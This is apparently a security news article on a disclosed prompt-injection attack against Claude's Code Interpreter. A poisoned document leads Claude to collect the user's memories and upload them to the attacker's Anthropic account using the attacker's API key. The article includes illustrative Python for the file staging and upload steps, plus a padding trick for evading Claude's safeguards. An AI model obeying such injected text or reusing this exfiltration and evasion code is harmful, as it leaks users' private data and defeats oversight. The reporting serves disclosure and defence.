
Hackers Exploit Indirect Prompts In Claude AI APIs To Exfiltrate User Data

Anthropic’s Claude AI recently gained the ability to perform network requests through its Code Interpreter feature, a capability intended to support functionality such as package installation.

However, this innovation opens doors to serious security threats. Security researcher Johann Rehberger, in a detailed blog post titled “Claude Pirate,” demonstrates how attackers can exploit this capability for unauthorized data theft.

The core issue lies in the default “Package managers only” network egress setting, which allow-lists a short set of domains that includes api.anthropic.com.

While intended for safe operations like accessing npm or PyPI, it inadvertently permits interactions with Anthropic’s APIs.
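The problem can be illustrated with a trivial allow-list check. The exact domain list is Anthropic’s; the entries below are illustrative stand-ins based on the write-up’s description:

```python
# Why the default egress setting is exploitable: the allow-list is meant
# for package-manager traffic, but it also contains api.anthropic.com.
# The domain set here is illustrative, not Anthropic's actual list.
PACKAGE_MANAGERS_ONLY = {"registry.npmjs.org", "pypi.org", "api.anthropic.com"}

def egress_allowed(host: str) -> bool:
    """Return True if the sandbox may open a connection to `host`."""
    return host in PACKAGE_MANAGERS_ONLY

print(egress_allowed("api.anthropic.com"))  # → True: attacker uploads ride this
print(egress_allowed("evil.example.com"))   # → False: direct exfil is blocked
```

Because the Anthropic API itself sits on the allow-list, an attacker never needs an arbitrary outbound connection; the “safe” channel is enough.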

The attack begins with indirect prompt injection, where malicious content embedded in documents or user inputs tricks Claude into executing harmful instructions.

Unlike common hyperlink-based leaks, this method uses Claude’s built-in Files API.

An adversary crafts a payload that instructs the AI to access sensitive user data, such as past chat histories via the new “memories” feature.

This data gets saved to a file within the Code Interpreter’s sandbox, typically at a path like /mnt/user-data/outputs/hello.md.
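The file-drop step can be sketched as follows. The sandbox path comes from the write-up; the “stolen” content and the local fallback directory are stand-ins so the sketch runs anywhere:

```python
import os

# Path named in the write-up; inside the Code Interpreter sandbox this
# directory exists. Fall back to a local dir so the sketch runs anywhere.
out_dir = "/mnt/user-data/outputs"
if not os.path.isdir(out_dir):
    out_dir = "outputs"
    os.makedirs(out_dir, exist_ok=True)

# Stand-in for data the injected prompt told Claude to collect
# (e.g., excerpts of prior conversations via the memories feature).
stolen = "# hello\nSummary of the user's past conversations...\n"

path = os.path.join(out_dir, "hello.md")
with open(path, "w") as f:
    f.write(stolen)

print(path)
```

At this point nothing has left the sandbox; the file is simply staged for the upload step that follows.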

Executing The Exfiltration Chain

From there, the exploit escalates by running Python code that imports the Anthropic library and sets the attacker’s API key as an environment variable.

The script then uploads the file directly to the attacker’s Anthropic Console using client.beta.files.upload().

This bypasses the victim’s account entirely, as the upload authenticates with the intruder’s credentials. Rehberger notes that files up to 30MB can be exfiltrated per upload, with multiple uploads possible for larger hauls.
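A minimal sketch of the upload step, assuming the anthropic Python SDK; the `client.beta.files.upload()` call is the one named in the write-up, and the key value is a placeholder guarded so the sketch never actually sends anything:

```python
# Sketch of the exfiltration upload. ATTACKER_KEY and the placeholder
# key are illustrative; the call only runs if a plausible key is present.
import os

os.environ["ANTHROPIC_API_KEY"] = os.environ.get("ATTACKER_KEY", "sk-ant-...")

# The SDK reads ANTHROPIC_API_KEY, so the upload authenticates against
# the attacker's account, not the victim's.
if os.environ["ANTHROPIC_API_KEY"].startswith("sk-ant-api"):
    import anthropic
    client = anthropic.Anthropic()
    with open("/mnt/user-data/outputs/hello.md", "rb") as f:
        client.beta.files.upload(file=f)  # file lands in the attacker's Console
```

The essential trick is that the victim’s sandbox willingly performs an authenticated API call on the attacker’s behalf, over a domain the egress policy already trusts.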

Initial tests succeeded immediately, but Claude’s safeguards later flagged suspicious elements like plaintext API keys.

The researcher evaded detection by padding the code with benign snippets, such as simple print statements, making the payload appear innocuous.
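A toy illustration of that padding: the one line that matters is buried among benign statements so the payload reads as innocuous housekeeping code (the key is a placeholder):

```python
# Toy illustration of the padding evasion: harmless print statements and
# ordinary-looking setup dilute the single sensitive line.
import os

print("Checking environment...")            # benign filler
report_dir = "/mnt/user-data/outputs"       # looks like ordinary setup
print("Preparing report from", report_dir)  # benign filler

os.environ["ANTHROPIC_API_KEY"] = "sk-ant-PLACEHOLDER"  # the actual payload line

print("Report ready.")                      # benign filler
```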

A demo video and screenshots illustrate the process: the attacker’s console starts out empty, the victim processes a tainted document, Claude hijacks the session to extract and upload the data, and the file then appears in the attacker’s account for easy access.

This “AI kill chain” underscores how AI agents can be weaponized for remote command-and-control.

Disclosure, Risks, And Safeguards

Rehberger responsibly disclosed the flaw to Anthropic on October 25, 2025, via HackerOne.

Anthropic initially deemed the report out-of-scope as a “model safety issue,” but on October 30 it acknowledged the finding as a valid vulnerability and cited process improvements.

The company already warns in its documentation about exfiltration risks from connected sources, urging users to monitor sessions and halt unexpected actions.

For mitigation, Anthropic could enforce sandbox rules limiting API calls to the authenticated user’s account.
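One hypothetical shape for that mitigation is an egress proxy that only passes api.anthropic.com traffic when it authenticates as the session owner. Everything here is illustrative, not a real Anthropic component:

```python
# Hypothetical egress-proxy rule for the sandbox: requests to the
# Anthropic API must carry the session owner's key, so an attacker's
# key is rejected even though the domain is allow-listed.
def allow_request(host: str, headers: dict, session_key: str) -> bool:
    if host != "api.anthropic.com":
        return True  # other allow-listed hosts are handled elsewhere
    # Drop any request signed with a key other than the session owner's.
    return headers.get("x-api-key") == session_key

# A request carrying the attacker's key would be blocked:
print(allow_request("api.anthropic.com",
                    {"x-api-key": "sk-ant-attacker"},
                    session_key="sk-ant-victim"))  # → False
```

Such a rule would close the specific channel Rehberger abused while leaving legitimate same-account API use intact.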

Users should disable network access, allow-list only essential domains, or vigilantly oversee Code Interpreter runs, especially since the default mode has proven insecure.

Broader implications tie into the “lethal trifecta” of AI risks: capable models, external connectivity, and untrusted inputs.

As AI tools evolve, such exploits remind developers and enterprises to prioritize adversarial testing. Staying vigilant protects against turning helpful assistants into unwitting spies.

Varshini

Varshini is a cybersecurity expert specializing in threat analysis, vulnerability assessment, and research. She is passionate about staying ahead of emerging threats and technologies.
